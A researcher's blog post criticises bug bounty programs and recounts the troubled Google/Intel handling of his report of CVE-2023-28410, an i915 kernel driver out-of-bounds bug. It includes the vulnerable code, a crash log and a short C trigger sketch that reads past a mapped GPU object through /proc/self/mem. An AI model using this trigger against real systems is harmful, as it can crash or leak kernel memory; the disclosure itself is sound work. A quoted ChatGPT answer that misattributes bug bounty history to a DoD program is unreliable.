At first, I didn’t plan to write an article about the problems with bug bounty programs. This was supposed to be a standard technical blogpost describing an interesting bug in the Linux kernel i915 driver allowing for linear Out-Of-Bound read and write access (CVE-2023-28410). Moreover, I’m not even into bug bounty programs, mostly because I don’t need to be: I consider myself lucky enough to have a satisfying, stable and well-paid job. That being said, in my spare time, apart from developing and maintaining the Linux Kernel Runtime Guard (LKRG) project, I still like doing vulnerability research and exploit development, not only for my employer, and from time to time it’s good to update your resume with new CVE numbers. Before I had a stable income, bug bounties didn’t exist, and most quality vulnerability research paid the bills via brokers (let’s leave aside the moral questions arising from this). However, nowadays we have bug bounty programs…

Over the last decade (and a bit longer), bug bounty programs have gained a lot of deserved traction. There are security researchers who rely on bug bounties as their primary(!) source of income. Such cases are irrefutable proof of the success of bug bounty programs. However, before the industry ended up where it is now, it went down a long and interesting road.

A little bit of history:

On November 5, 1993, Scott Chasin created the bugtraq mailing list in response to the problems with CERT. There, security researchers could publish vulnerabilities regardless of vendor response, as part of the full disclosure movement. On July 9, 2002, Len Rose created Full Disclosure – a “lightly moderated” security mailing list – because many people felt that the bugtraq mailing list had “changed for the worse”.
However, not everyone agreed with the “Full Disclosure” philosophy, and the two major alternatives can be summarized as Non-Disclosure and Coordinated Disclosure (also known as “Responsible Disclosure”). Non-Disclosure is generally favored by blackhat hackers and, later, by commercial exploit vendors (including brokers).

Coordinated (responsible) vulnerability disclosure is a policy under which researchers agree to report vulnerabilities to a coordinating authority, which then reports them to the vendor, tracks the fixes and mitigations, and coordinates the disclosure of information with stakeholders, including the public. In some cases, the coordinating authority is the vendor.
However, some researchers started to raise concerns about how vendors handle reported vulnerabilities (and treat the researchers as enemies), while others started to expect compensation for their reports (bug bounty-like programs).

“No more free bugs”

In March 2009 at the CanSecWest conference, Alex Sotirov, Dino Dai Zovi and Charlie Miller announced the “No More Free Bugs” campaign, spreading the word that, in most cases, they would no longer be providing vendors with free vulnerability notices. Regardless of how effective it was (not really: https://twitter.com/0xcharlie/status/1480593646756024323), it certainly made industry news and opened a broader debate about the problem. It is worth mentioning that in the old days, security researchers who got a free t-shirt for their work could consider themselves lucky 😉 The real rewards came in fame and job offers from third parties (if at all).

The reason I’m mentioning all these “past problems” is that they are the basis of how and why we have bug bounty programs today in one form or another. Moreover, we certainly would NOT want to see the industry return to the shape it was in back in those days.

Bug bounty programs – A new wonderful world!

Let’s ask ChatGPT the following question:

  • “What is the history of bug bounty programs?”
  • “Bug bounty programs have their origins in the early days of the internet, with companies such as Netscape and Mozilla offering rewards for the discovery and reporting of security vulnerabilities in their software. The concept of a “bug bounty” was formalized by the United States Department of Defense in the early 2000s with the launch of the Vulnerability Reward Program (VRP). Since then, many technology companies and organizations have implemented similar programs, offering rewards to security researchers for finding and reporting vulnerabilities in their systems. These programs have become an important tool in the fight against cybercrime, as they incentivize individuals to find and report vulnerabilities before they can be exploited by malicious actors.”

Pretty accurate 😉 While the market for vulnerabilities has developed, vulnerability commercialization (or “bug bounties”) remains an important tool allowing developers to discover and resolve bugs before the general public becomes aware of them, preventing incidents of widespread abuse and data breaches.

However, some people might ask: “Why do companies bother creating a bug bounty program?”. It’s a fair question – what’s the point (from the companies’ perspective) of paying money to “random” people for finding bugs in their products? Bug bounties benefit not only the researchers. In fact, if a company’s security is mature enough and its product development is security-oriented (which is usually not the case), they can actually bring a lot of benefits, including:

  • Cost-effective vulnerability management – bug bounties can be more cost-effective than hiring a third-party security firm to conduct penetration testing or vulnerability assessments, which can be expensive (especially for very complicated and mature products). Additionally, with a bug bounty program, companies can expand their testing and vulnerability research coverage, as they can have many security researchers with different levels of expertise, experience, and skills testing their products and systems. This can help the company to find vulnerabilities that might have been missed by their internal team.
  • Brand reputation – by having a bug bounty program, companies can show that they care about security and are willing to invest in it. It can also help to improve the company’s reputation in the security industry.
  • “Protect” the brand – by opening a bug bounty program, companies can encourage researchers to report vulnerabilities directly to them, rather than publicizing them or selling them to malicious actors. This can help to mitigate various security risks.
  • “Advertisement” to potential customers – a bug bounty program shows that a company takes security seriously and is actively working to identify and address vulnerabilities. Companies can thereby build trust with their customers, partners, and other stakeholders.

Nevertheless, it should be noted that having a bug bounty program does not replace the need for a secure SDLC, regular security testing, vulnerability management practices, and more. It’s an additional layer of security that can complement the existing security measures in place.

“Bug bounties are broken”

As we can see, bug bounties are very successful because both parties – researchers and companies – benefit from them. That being said, in recent years more and more security researchers have started to loudly complain about specific bounty programs. A few years ago, given the success of bug bounties, such unfavorable opinions were marginal. Of course, they have always been there, but they certainly were not as visible. Whenever a new company joined the revolution by opening a bug bounty program, it was praised (especially by the media) for being mature and understanding the importance of security problems instead of pretending that security problems don’t affect it. However, has any media article really analyzed how such programs work in detail? Are there really no traps hidden for researchers in the conditions of the program?

Unfortunately, it seems as if every month social media (Twitter?) discusses cases of, to put it mildly, controversial activities by some companies around their bug bounty programs. Is the golden age of bug bounties over? Perhaps little has changed other than more researchers starting to rely on bug bounties as a primary (or significant) source of income. Naturally, problems with bug bounties significantly affect their lives and cause them to raise their concerns more broadly and boldly.

Bug bounties (as well as any type of vulnerability reporting program) have always involved risk for the researchers. Some of the main reasons (again, thanks to ChatGPT! :)) include:

  1. Insufficient rewards – some researchers may feel that the rewards offered by bug bounty programs are insufficient, either in terms of the monetary value or the recognition they receive. This can be especially true for researchers who discover high-severity vulnerabilities, which may be more difficult or time-consuming to find.
  2. Slow or unresponsive communication – researchers may be frustrated by slow or unresponsive communication from bug bounty program coordinators, especially when it comes to triaging and addressing reported vulnerabilities.
  3. Lack of transparency – researchers may feel that there is a lack of transparency in how bug bounty programs are run and how rewards are determined. They may also feel that there is a lack of communication about which vulnerabilities are being fixed and when.
  4. Unclear scope – researchers may feel that the scope of the bug bounty program is not clearly defined, making it difficult for them to know which vulnerabilities are in scope and which are not.
  5. Duplicate reports – researchers may feel frustrated when they report a vulnerability and then find out that it has already been reported by someone else. This can be especially frustrating if they are not rewarded for their work.
  6. Rejecting a report – researchers may feel that their report is rejected without a clear explanation, or that their report is not considered a vulnerability.
  7. No public recognition – some researchers may want to be publicly recognized for their work and not just rewarded with money.

As you can imagine, every single case from that list happens to some extent. However, the fair question to ask is: “what is the root cause that makes such problems possible?”.

“Imbalance of Power”

The fundamental problem with bug bounties is that they are not only created by the companies/vendors, but entirely and arbitrarily defined by them, and security researchers are at their mercy, without any recourse (because to whom can you appeal? To those who created and defined the program and decided what to do with the reported work?). We have a problem with an imbalance of power.
In an ideal world, we would have equitable terms that both parties agree on – what is to be expected under what circumstances – before a security researcher even starts the work. Bug bounties are simply not structured this way.
Moreover, there’s a lot of false and misleading advertising, e.g., all of these articles showcasing million-dollar bug hunters, giving the impression that YOU too can become rich doing bug bounties. A lot of young and motivated people, sometimes living in completely different countries than the company, have few options to fight for their rights when they are wronged. They might not know their legal rights, or they don’t have the experience and capital to pursue them. However, some people in such a situation try to fight by putting pressure on the company via social media, and we see that from time to time, e.g., on Twitter.

Let’s look at some examples (of many) of the problems with bug bounty programs that researchers have had to deal with:

1) “Rejecting a report”, “Slow or unresponsive communication”, “Unclear scope”, “Lack of transparency”, “No public recognition”, and, after an appeal, “Insufficient rewards” from the researcher’s perspective:

“Windows 10 RCE: The exploit is in the link” (December 7th, 2021)

Quote from the researchers’ blogpost:

"Microsoft Bug Bounty Program's (MSRC) response was poor: Initially, they misjudged and dismissed the issue entirely. After our appeal, the issue was classified as "Critical, RCE", but only 10% of the bounty advertised for its classification was awarded ($5k vs $50k). The patch they came up with after 5 months failed to properly address the underlying argument injection (which is currently also still present on Windows 11)"

In that specific case, the researchers “hit” 6(!) out of the 7 general potential problems with bug bounties (almost a jackpot! :)). It is very fascinating and educational to read the entire section on their communication with Microsoft (highly recommended). What is worth pointing out is that:

"Someone at MS must agree with us, because the report earned us 180 Researcher Recognition Program points, a number which we could only explain as 60 base points with the 3X bonus multiplier for 'eligible attack scenarios' applied."

2) “Unclear scope”, which resulted in “Insufficient rewards” from the researcher’s perspective:

A researcher found a bug in the DirectX virtualization feature which allowed him to escape the VM boundary. However, DirectX is not a part of Hyper-V itself but a separate feature which Hyper-V can use to provide certain functionality. DirectX is off by default unless certain features opt to turn it on. However, the researcher argued that this specific feature is on by default on WSL2, as well as at some cloud providers which provide DirectX virtualization (for some scenarios).

That’s an interesting case from the scoping perspective because, at the end of the day, the researcher developed a PoC and proved it could escape the VM boundary. Regardless of whether the problem is in a core Hyper-V component or not, such bugs are valuable on the black market, and one of the brokers suggested contacting them next time instead of the bug bounty program.

3) “Unclear scope” and “Rejecting a report”

https://medium.com/@wlymoyi/how-i-find-microsoft-sever-rce-issues-they-fixed-but-didnt-pay-any-bounty-43a66e1aa002

A researcher found a few instances of Microsoft Exchange servers whose IPs/domains belong to Microsoft and which were vulnerable to the ProxyShell attack. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. By exploiting these vulnerabilities, attackers can perform remote code execution.

The researcher reported these issues to MSRC, and after about a month Microsoft fixed all of them and sent the researcher negative messages, claiming that all the issues were out of scope and/or of only moderate severity. The researcher argued that by combining all these issues you get RCE in the end, and RCE is certainly not a moderate issue (especially since Microsoft fixed the reported problems).

4) “Duplicate reports” and “Slow or unresponsive communication”

https://twitter.com/matrosov/status/1615815047653265410

A researcher submitted multiple high-impact vulnerabilities, and months later the vendor rejected all the bugs, arguing that it had known about them because it had discovered exactly the same bugs internally prior to the submission. However, at the same time the vendor didn’t and couldn’t provide any evidence (no CVEs) that it had really found them by itself (internally). Moreover, the vendor took a long time to respond, which raises questions about (and undermines the credibility of) the internal findings.

5) “Insufficient rewards”

“Researcher drops Lexmark RCE zero-day rather than sell vuln “for peanuts””
https://portswigger.net/daily-swig/researcher-drops-lexmark-rce-zero-day-rather-than-sell-vuln-for-peanuts

Quote from the article:

According to the researcher, Lexmark was not notified before the zero-day's release for two reasons.
First, Geissler wished to highlight how the Pwn2Own contest is "broken" in some regards, as shown when low monetary rewards are offered for "something with a potentially big impact" such as an exploit chain that can compromise over 100 printer models.
Furthermore, he said that official disclosure processes are often long-winded and arduous.
"In my experience, patching efforts by the vendor are greatly accelerated by publishing turnkey solutions in the public domain without any heads up whatsoever," Geissler noted.
"Lexmark might reconsider partnering with similar competitions in the future and opt to launch their own vulnerability bounty/reward program."

“Linux Kernel i915 Linear Out-Of-Bound read and write access”

So, what’s the story of the i915 driver vulnerability from the title of this article? Sometimes, when I really need a break from my day-to-day work and I’m burnt out working on LKRG, but at the same time still want to do vulnerability research (I’m rarely in such a state), I either read (for fun) the source code of OpenSSH (which resulted in, e.g., CVE-2019-16905 or CVE-2011-5000) or the Linux kernel:
https://sourcegraph.com/search?q=context:global+repo:%5Egithub%5C.com/torvalds/linux%24+type:commit+zabrocki&patternType=standard&sm=1&groupBy=path
https://github.com/torvalds/linux/search?q=zabrocki&type=commits

In November 2021, during analysis of the i915 driver, I found a linear Out-Of-Bound (OOB) read and write access causing a memory corruption and/or memory leak bug. The vulnerability exists in the ‘vm_access‘ function, typically used for debugging processes. This function is needed only for VM_IO | VM_PFNMAP VMAs:

static int
vm_access(struct vm_area_struct *area, unsigned long addr,
          void *buf, int len, int write)
{
        …
        if (write) {
[1]             memcpy(vaddr + addr, buf, len);
                __i915_gem_object_flush_map(obj, addr, len);
        } else {
[2]             memcpy(buf, vaddr + addr, len);
        }
        …
}

The ‘len‘ parameter is never verified and is directly used as an argument to the memcpy() function. At line [1], memcpy() writes user-controlled data to the “pinned” page, causing a potential memory corruption / overflow vulnerability. At line [2], memcpy() reads memory (data) from the “pinned” page into an area visible to the user, causing a potential memory leak problem.
The full and detailed description of the bug with all the analysis (and PoC) can be found here:
http://site.pi3.com.pl/adv/CVE-2023-28410_i915.txt
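
For illustration, the missing sanity check could look roughly like the sketch below (hypothetical code; the actual upstream fix may be shaped differently – the advisory and the final patch are authoritative). The idea is to reject any access that would run past the end of the pinned object before either memcpy() at [1] or [2] is reached, assuming ‘addr’ has already been converted into an offset within the object (as its use in ‘vaddr + addr’ implies) and ‘obj’ is in scope as in the full function:

/* Hypothetical bounds check (a sketch, not the exact upstream patch):
 * the copy must fit entirely within the object's backing store. */
if (len < 1 || addr + len > obj->base.size)
        return -EINVAL;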

I identified 3 different interfaces which could be used to trigger the bug, and I shared my finding with my friend Jared (https://twitter.com/jsc29a); we started working on a PoC. We quickly developed a very reliable PoC crashing the kernel:

[ 2706.589001] BUG: unable to handle page fault for address: ffffb23ac04fa000
[ 2706.589011] #PF: supervisor read access in kernel mode
[ 2706.589016] #PF: error_code(0x0000) - not-present page

[ 2706.589140] Call Trace:
[ 2706.589264] ? vm_access+0x75/0xc0 [i915]
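
To give a flavor of how such a handler can be reached from userspace (the exact 3 interfaces and the original PoC are in the advisory; the sketch below is only an illustration with assumed paths and a placeholder mapping): one classic route to a VMA’s ->access callback is /proc/<pid>/mem, which the kernel services via access_remote_vm(), and for VM_IO | VM_PFNMAP mappings that code falls back to vma->vm_ops->access – i.e., vm_access() here – passing the caller’s length through unclamped:

/*
 * Minimal sketch (NOT the original PoC). The device path, the plain
 * mmap() of the render node and the sizes are assumptions; the real
 * PoC sets up a GEM object via i915-specific ioctls first.
 */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
        int drm = open("/dev/dri/renderD128", O_RDWR); /* assumed i915 render node */
        if (drm < 0) { perror("open drm"); return 1; }

        /* Placeholder for mapping a 4 KiB GEM object. */
        size_t obj_size = 4096;
        void *map = mmap(NULL, obj_size, PROT_READ | PROT_WRITE,
                         MAP_SHARED, drm, 0);
        if (map == MAP_FAILED) { perror("mmap"); return 1; }

        /* Reading our own mapping through /proc/self/mem is serviced by
         * access_remote_vm(), which for VM_IO | VM_PFNMAP VMAs falls back
         * to vma->vm_ops->access – vm_access() for i915. */
        int mem = open("/proc/self/mem", O_RDONLY);
        if (mem < 0) { perror("open mem"); return 1; }

        /* Ask for more bytes than the object holds: on a vulnerable kernel
         * the unchecked 'len' walks past the pinned page. */
        static char buf[2 * 4096];
        ssize_t n = pread(mem, buf, sizeof(buf), (off_t)(uintptr_t)map);
        printf("pread returned %zd\n", n);
        return 0;
}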

At that point I usually decide either to develop a fully weaponized exploit or to contact the vendor ASAP to report and get the issue fixed. However, just out of curiosity, I wanted to know where Intel’s GPU (with the i915 driver) is enabled (by default), and I realized that it is used in multiple interesting places, including:

  1. Google Chromebook / Chromium
  2. Most of the business laptops
  3. Power-efficient laptops
  4. Any device using Intel CPU with integrated GPUs

but hold on… doesn’t point 1 (Chromebook) have a bug bounty program? Maybe it’s a good time to try bug bounties myself? How does it even work? Everyone praises Google and their security, right?

So, let’s see what’s going on here:
https://bughunters.google.com/about/rules/5745167867576320/chrome-vulnerability-reward-program-rules

“…
In addition to the Chrome bug classes recognized by the program, we are interested in reports that demonstrate vulnerabilities in Chrome OS’ hardware, firmware, and OS components.

Sandbox escapes
Additional components are in scope for sandbox escapes reports on Chrome OS. These include:

Obtaining code execution in kernel context.
…”

OK, looks like it should be in scope for their bug bounty. Let’s try that path and see how it goes 🙂 I didn’t have much time left to spend on this bug, but I slightly modified the PoC to leak something (not just crash the kernel). It was relatively easy, so I opened the bug and waited to see where it would go:
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640

Then on Saturday (Feb 5th, 2022) I had some extra free time and decided to see how easy it would be to weaponize the PoC, and I realized something not so great 🙂
When I developed my PoC leaking something interesting, I did it on my debugging machine with a special configuration including KASAN and all of that. To my surprise, when I re-ran the PoC on a “fresh and clean” VM, I was constantly crashing the kernel and not leaking anything. Well… that started bothering me, so I spent some time analyzing what was going on. After heavy work and a technical discussion with spender (kudos to grsecurity), I realized that when you enable PFN remapping (for debugging some of my peripherals) together with KASAN, the VM_NO_GUARD flag is set. When KASAN is NOT enabled, unfortunately, vmap() and vmap_pfn() place a GUARD page at the top of the mapping in exactly the same way as vmalloc() adds a GUARD page at the top of each allocation 🙁 Because of that, my PoC was working very well on my debugging kernel but not on a “fresh” VM. Well… I thought I should update the bug which I had opened, to be fair and transparent, and I shared all the information (including updating the technical details in the advisory and adding a snippet of the relevant kernel code):
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c3
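
For context, the guard page behavior comes from the generic vmalloc-area code. Paraphrased from mm/vmalloc.c, __get_vm_area_node() (the exact code varies between kernel versions):

/* Unless the caller passes VM_NO_GUARD, the area is sized one page
 * larger than requested, leaving an unmapped guard page right after
 * the mapping. A linear OOB access then faults on the guard page
 * instead of silently reaching whatever happens to be mapped next. */
if (!(flags & VM_NO_GUARD))
        size += PAGE_SIZE;

This is why the PoC leaked data on my KASAN/PFN-remapping configuration (where VM_NO_GUARD was set) but only crashed a stock kernel.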

At that point I kind of expected that the Chromebook configuration doesn’t enable KASAN in production (why would they? :)), so even though the bug is great by itself, it only allows crashing the kernel (no code-exec, unless KASAN is enabled ;-)). However, the bug should be fixed anyway (even if it is a kernel DoS), and under non-standard configurations (with the VM_NO_GUARD flag) it is exploitable. Google summarized the bug (based on what I shared) as:

“Thanks for the detailed report! Has this also been reported against upstream Linux and/or to the driver maintainers?

Here is a summary according to my understanding:

  • i915 GPU buffers can be accessed via vm_remote_access (intended for debugging buffers no residing in the userspace process’ address space)
  • The function that performs the memory access is lacking a length check, allowing userspace to attempt OOB read/writes past the buffer end
  • The standard kernel configuration has guard pages in place, which causes an access violation in the kernel, not an actual OOB access

Assuming the above is correct, this is a denial of service situation (since we reliably crash accessing the guard page), thus Severity-Low. We still want this fixed, but waiting for upstream to fix and then consuming the fix via stable branches is sufficient.”

Additionally, they confirmed that the PoC crashes all the kernels. I didn’t really agree with the statement “(…) causes an access violation in the kernel, not an actual OOB access” because it is the other way around: it IS an actual OOB access, and because of that it causes an access violation. However, I decided not to be picky and ignored it. I confirmed their statement, Google assigned “low” severity to the bug and informed me that they would forward all the information to Intel PSIRT… Sure 🙂 Now the “fun” part starts…

  • I reported the issue to Google on February 3rd, 2022
  • Google reported the issue to Intel on February 8th, 2022
  • Google went silent for 58 days
  • On April 7th, 2022, I asked if there were any updates
  • Silence for another 5-6 days

On April 12th, 2022, I was doing some LKRG development for the latest vanilla kernel, and during a git sync I realized that the i915 kernel file where I had found the bug had been updated. Hm… It is “suspicious” to start seeing such “random” updates to that file while not getting any updates from Google for almost 2 months. Let’s see what’s going on… and what I found completely shocked me 🙂

In summary, Google stayed silent for 58 days and didn’t reply to my messages, and in the meantime Intel had fixed the bug more than a month earlier, suggesting they had found it themselves. However, as a consolation prize, they put me down as an author of the patch, using my old Microsoft address (while I haven’t worked for Microsoft since 2019). So far, bug bounty programs are doing great! 🙂

It looks like I hit the following problems so far:

  • “Slow or unresponsive communication” – in fact, I would elevate it to no communication at all
  • “Lack of transparency” – the bug ended up being fixed while no one gave any updates for almost 2 months
  • “No public recognition” – the fixes suggest that the bug was found internally by Intel

I wrote to Google about all my findings, after which they finally replied, saying that they hadn’t contacted Intel, nor had Intel contacted them. Google had taken on the responsibility of coordinating the bug reporting/fixing process but didn’t follow up on what was going on for 2 months.

On top of the listed potential problems with bug bounty programs, a “middle-man” like Google might deserve its own list of unique problems. However, at the same time, the described problems can fall into the brackets of “Slow or unresponsive communication” and “Lack of transparency”.

Going back to the main story, Google added me to the mail thread and went silent again. In the meantime, I started talking with Intel directly, and on April 12th they promised to get back to me by EOW after finding out what was going on. I reminded them about it on April 14th, and they were still silent. Then I poked them again on the 18th because, of course, I hadn’t heard back from them by the end of the week (“Slow or unresponsive communication” and “Lack of transparency”). Then I got a reply which was kind of… weird?

“I appreciate your patience with this. The issue has received a positive triage and was reproducible. We are currently working with the product team to settle on a severity score and a push to mitigation.(…)”

This reply didn’t make sense, because by the time of this conversation Intel had already created a patch for the issue (on March 3, 2022, 6:04 a.m.) and merged it into the official Linux kernel on March 14th, 2022. In short, the bug had already been fixed and pushed to the Linux git repo, making it essentially public for 40+ days. Despite this, no CVE had been assigned and no security bulletin had been published. However, Intel was claiming that they were still triaging the issue…

I also didn’t get why I had to start resolving issues which I didn’t create. This bug was officially reported to Google, and I would expect that it is Google’s responsibility to handle the communication and fixes correctly. I asked Google about that, and the reply which I got was a long corporate statement which, in short, said something like: “It’s Intel’s problem, not ours. We are OK, the severity is low, so what’s your problem?”
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c22

Well… I do understand, and I’m fully aligned and agree, that it is the responsibility of the component’s owner (Intel in this case) to handle any fixes. However, I would question whether this kind of communication is an industry standard, as there was no follow-up with the researcher (February – April) and no follow-up with the vendor throughout.
When I asked for updates, I received no reply until I discovered by myself that the bug had already been fixed, in a shady way, at least a month earlier.

In short, Google’s reply can be summarized as “It’s Intel’s problem and now they are doing OK, they are not shady”:
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c22

Google’s approach might fall into something equivalent to the “Unclear scope” bracket of problems, but unique to a “middle-man”. It is Google’s actual responsibility, as a coordinator, to handle the bugs reported to them.

Additionally, I got a pretty interesting statement:

“We are all humans running and crewing security programs trying to triage our own discoveries as well as those from external reporters and trying to run decent VDP programs. All the folks I work with in Chrome/Chrome OS greatly appreciate the contributions of the external researchers – such as yourself- are trying their best to get bugs fixed and want to do the right thing. There are smart people and solid processes to stay on top of all this, but at the end of the day mistakes are going to happen – bugs may get mistriaged, reports may get merged in the wrong direction giving someone else the acknowledgement for a finding, someone may not always respond in a timely manner. But 100% of the time, if you reach out, one of us will respond, hear you out and work with you to make things as right as possible.
From what I can see in the comments above and in the email thread, each time you reached out to mnissler@, he responded fairly quickly. He could only do so much to get you the information you wanted because we are on the outside of that process. He did go and attempt to coordinate with Intel as best as possible and to eliminate the need for the middle-person to run comms, added you on the email thread so you could directly coordinate with the vendor/Intel.”

Behind all these sweet words, what is really written is: “well, shit happens, deal with it, not our problem”. Moreover, there is a lack of any explanation of what really happened here (a serious “Lack of transparency”).
In fact, there is nothing in what she wrote that I would disagree with, except “always respond in a timely manner” (please look at the dates on comments 14, 15, 16 and 17). Almost 2 months of no reply and no follow-up is certainly not a response “in a timely manner” (“Slow or unresponsive communication”).
What is craziest is that, from Google’s perspective, everything was done as it should have been, including communication. I’m surprised by this, and I would respectfully disagree.
If during this time (February – April 2022) anyone had followed up with the vendor and sent even a single email asking for updates, this mess could have been avoided.

How did it end?

Intel continued “triaging the bug” until October 2022(!). They kept postponing the release date from October to November, then to February 2023… and then to May 2023 (remember that the bug was reported in February 2022, silently fixed as an internal finding in March 2022, and originally found by me in November 2021 :)).

Bulletin: INTEL-SA-00886 / CVE-2023-28410

Lesson learned

My experience with bug bounties was much worse than I expected. Especially Google’s attitude of staying silent forever until things went horribly/obviously wrong. Then they tried to put the responsibility for everything on Intel and convince me that it was not their problem (even though the bug was reported to them) and that they had been handling the communication very well(!). As a researcher, what can you do? Nothing.
Intel screwed up badly, but they tried their best to fix what they had messed up (and what was still possible to fix at that point). Contrary to Google’s attitude, Intel didn’t blame anyone, didn’t try to convince me that they had been doing their best all along, and they were not dismissive.

It is worth mentioning that Intel officially apologized for how this case was handled: “(…) We would like to apologize for the way this case has been handled. We understand the back and forth with us has been frustrating and a long process. (…)“. However, nothing like that happened on Google’s part.

If this bug had really been valuable from the exploitability perspective, it looks like the best option would still be to dust off the old broker contacts (if we leave the moral questions aside). They have never failed this badly (at least in my experience), even though they are not ideal either.

Btw, to be fair, there are also positive examples of bug bounty programs, like this one:
https://twitter.com/ergot86/status/1618977435898494976

Closing words

The decision whether or not to write this article matured in me for quite a long time, for many different reasons. However, when I came to the conclusion that it is worth describing the generally unspoken problems associated with bug bounty programs (including my specific case), the following people contributed to its final form (random order):

I hope that we as a security community can start a conversation about how the described unspoken problems of bug bounties can be addressed. The “Imbalance of Power” is a real problem for researchers, and it needs to change.

Thanks,
Adam

Comments

  1. reader on 05.17.2023

    Seems that you have the same kind of experience as many other bug hunters. I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist. For every one of these stories, there are thousands of other bug bounty reports that get communicated, resolved, and rewarded on time and with happy people on all sides.

    What are your personal statistics regarding positive, neutral, and negative experience reports?

  2. Niccolo Belli on 05.19.2023

    > I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist

    It doesn’t have to. Instead of the stupid liability rules which will harm Free Software, the EU could regulate bounty programs and even create independent arbitration.

  3. Maulik Mistry on 05.19.2023

    This experience nearly broke my heart, coming after other experiences I’ve gone through myself. I appreciate you writing it up and standing up for yourself, because it gives me an example in our industry of cutting through language that limits or diminishes worthwhile efforts. Thank you.

    I’ll relate a (somewhat unrelated) issue where we don’t seem to have proper teamwork in handling bugs until enough people post about a problem to give it significance – matching the pattern of the things you note. Android 13 seems to have a broken Bluetooth stack, but there is little visibility into how the process will move this through to resolution, while medical devices lose their connections. It is marked with a fixed status, but there isn’t even a comment on where or how. . .
    Android 13: Unable to reconnect reliably to bonded peripheral https://issuetracker.google.com/242755161

  4. observer on 05.20.2023

    It seems to me the researcher has the power, but forfeits it by giving the bug details to the vendor before agreeing on compensation. The researcher should publicly demonstrate the exploit (e.g. via screen recording) to show how severe the issue is, but without revealing the details of the vulnerability. Then negotiate with the vendor for a bug bounty price before disclosing the details to the vendor.

  5. Giacomo Pagina on 05.25.2023

    > > I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist
    >
    > It doesn’t have to. Instead of the stupid liability rules which will harm Free Software, the EU could regulate bounty programs and even create independent arbitration.

    TBH that sounds like a dead end to me. Every time govs are involved in something, they never deliver improved tools, frameworks, or processes. Actually, bureaucracy always gets stuff muddy.

    There are many companies already acting this way, like hackerone.com (@Niccolo: even a platform that is currently under development in Martinsicuro! xD).

    I’d like to know the author’s feedback on these bug bounty solutions.
